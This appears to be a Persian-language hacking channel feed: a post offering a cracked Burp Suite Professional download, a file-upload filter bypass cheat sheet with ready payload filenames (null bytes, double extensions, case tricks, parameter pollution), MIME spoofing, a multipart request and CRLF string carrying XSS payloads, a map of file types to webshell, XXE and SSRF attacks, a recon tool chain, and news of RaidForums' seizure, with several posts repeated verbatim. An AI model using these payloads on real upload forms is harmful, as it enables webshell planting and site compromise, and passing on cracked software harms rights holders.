burpsuite_pro_v2022.1.zip
503 MB
Burp Suite Professional v2022.1
😈 + Crack
Released 24 January 2022
😈 + Crack
Released 24 January 2022
نکاتی برای دور زدن محدودیدت آپلود فایل:
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
nmap -sV -A -> nikto -h -> amass -> subli3ter ->girtrob
CyberSecurity
https://wordlists.assetnote.io/
fuzz wordlist
✔️ انجمن هکینگ Raidforums توسط پلیس مصادره شد.
مدیران انجمن هک Raidforum میگویند دامنه رسمی این سایت (Raidforums.com) توسط پلیس مصادره شده و مدیر اصلی سایت ( با نام کاربری Omnipotent ) مدت زیادی است که مفقود شده و احتمالا دستگیر شده است!
این سایت از انجمنساز MyBB استفاده میکند و چند هفته پیش به علت ضعف امنیتی و عدم بهروزرسانی دیتابیس این انجمن هک شد و هکرها بعد از دانلود اطلاعات جداول دیتابیس را Drop کردند که هکرهای دیگر نتوانند به دیتابیس انجمن دسترسی پیدا کنند.
- نکته قابل توجه این است که اکثر دیتاهایی که بصورت عمومی از سرویس های ایرانیان فروخته میشد در این فروم قرار میگرفت!
انجمن Raidforums یکی از بزرگترین سایتهای هک تحت وب بود که بیشتر برای درز اطلاعات و خرید و فروش دیتابیس مورد توجه قرار داشت.
مدیران انجمن هک Raidforum میگویند دامنه رسمی این سایت (Raidforums.com) توسط پلیس مصادره شده و مدیر اصلی سایت ( با نام کاربری Omnipotent ) مدت زیادی است که مفقود شده و احتمالا دستگیر شده است!
این سایت از انجمنساز MyBB استفاده میکند و چند هفته پیش به علت ضعف امنیتی و عدم بهروزرسانی دیتابیس این انجمن هک شد و هکرها بعد از دانلود اطلاعات جداول دیتابیس را Drop کردند که هکرهای دیگر نتوانند به دیتابیس انجمن دسترسی پیدا کنند.
- نکته قابل توجه این است که اکثر دیتاهایی که بصورت عمومی از سرویس های ایرانیان فروخته میشد در این فروم قرار میگرفت!
انجمن Raidforums یکی از بزرگترین سایتهای هک تحت وب بود که بیشتر برای درز اطلاعات و خرید و فروش دیتابیس مورد توجه قرار داشت.